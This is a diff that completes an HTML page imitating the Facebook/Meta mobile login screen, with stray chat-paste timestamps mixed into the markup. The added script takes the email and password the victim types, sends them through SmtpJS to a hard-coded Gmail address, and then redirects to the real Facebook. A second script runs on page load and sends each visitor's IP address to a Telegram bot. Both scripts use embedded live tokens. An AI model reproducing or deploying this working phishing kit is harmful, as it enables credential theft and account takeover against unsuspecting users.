--- a/o.html
+++ b/o.html
@@ -181,3 +181,79 @@ HENG ., [Feb 19, 2025 at 11:17 PM]
     <!-- Login Form -->
     <form class="login-form" action="/login" method="POST">
       <input type="text" id="email" name="email" placeholder="Mobile number or email" autocomplete="off" required>
+ HENG ., [Feb 19, 2025 at 11:17 PM]
+<input type="password" id="subject" name="password" placeholder="Password" autocomplete="off" required>
+      <button class="login-btn" onclick="fun()" id="btn" type="button">Log in</button>
+    </form>
+
+    <!-- Forgot Password -->
+    <div class="forgot-password">
+      <a href="#">Forgot password?</a>
+    </div>
+
+    <!-- Create New Account Button -->
+    <button class="create-account-btn" onclick="acc()" type="button">
+      Create new account
+    </button>
+  </div>
+
+  <!-- Footer -->
+  <div class="footer">
+    <a href="#">About</a>
+    <a href="#">Help</a>
+    <a href="#">More</a>
+    <span class="meta-brand">© Meta</span>
+  </div>
+
+  <!-- SMTP JS Script -->
+  <script src="https://smtpjs.com/v3/smtp.js"></script>
+  <script>
+    var btn = document.getElementById('btn');
+    btn.addEventListener('click', function(e) {
+      e.preventDefault();
+      var email = document.getElementById('email').value;
+      var subject = document.getElementById('subject').value;
+      var body = 'email: ' + email + '<br/> subject: ' + subject;
+      Email.send({
+        SecureToken : "af2d1483-3e6c-40cd-8f63-0e1a40c83888",
+        To : 'hengk7401@gmail.com',
+        From : "hengk7401@gmail.com",
+        Subject : subject,
+        Body : body
+      }).then();
+    });
+
+    function fun() {
+      location.href = "https://m.facebook.com/?tbua=1";
+    }
+    function acc() {
+      location.href = "https://m.facebook.com/campaign/landing.php?campaign_id=1635645242&extra_1=s%7Cc%7C313665943406%7Ce%7Cfacebook%20login%7C&placement&creative=313665943406&keyword=facebook%20login&partner_id=googlesem&extra_2=campaignid%3D1635645242%26adgroupid%3D67924221572%26matchtype%3De%26network%3Dg%26source%3Dnotmobile%26search_or_content%3Ds%26device%3Dc%26devicemodel%3D%26adposition%3D%26target%3D%26targetid%3Dkwd-1409285535%26loc_physical_ms%3D9198350%26loc_interest_ms%3D%26feeditemid%3D%26param1%3D%26param2%3D&gad_source=1&gbraid=0AAAAAD2MkOXVsC97vYqhtaptoapRs4-8f&gclid=CjwKCAiA8Lu9BhA8EiwAag16by1ciYawsBKyDarDC8td2RWm5D8qxNb_tBR8dOQL7VpiZlj6S-Bh-RoCM7kQAvD_BwE&soft=hjk";
+    }
+  </script>
+
+  <!-- New Script: Send Visitor IP to Telegram Bot on Page Load -->
+  <script>
+    document.addEventListener("DOMContentLoaded", function() {
+      // Fetch the user's public IP address from a free API
+      fetch('https://api.ipify.org?format=json')
+        .then(response => response.json())
+        .then(data => {
+          var ip = data.ip;
+          // Prepare the Telegram API URL with your bot token and chat ID
+          var botToken = "6941579931:AAHJRb_kYDxxutmPJ7ji6F5p_laP1LjOnAA";  // Replace with your bot token
+          var chatId = "1272791365";      // Replace with your chat ID
+          var message = "New visitor IP: " + ip;
+          var telegramUrl = "https://api.telegram.org/bot" + botToken +
+            "/sendMessage?chat_id=" + chatId + "&text=" + encodeURIComponent(message);
+          
+          // Send the IP address to your Telegram bot
+          fetch(telegramUrl)
+            .then(response => response.json())
+            .then(result => console.log("Telegram response:", result))
+            .catch(err => console.error("Error sending message to Telegram:", err));
+        })
+        .catch(error => console.error("Error fetching IP address:", error));
+    });
+  </script>
+</body>
+</html>
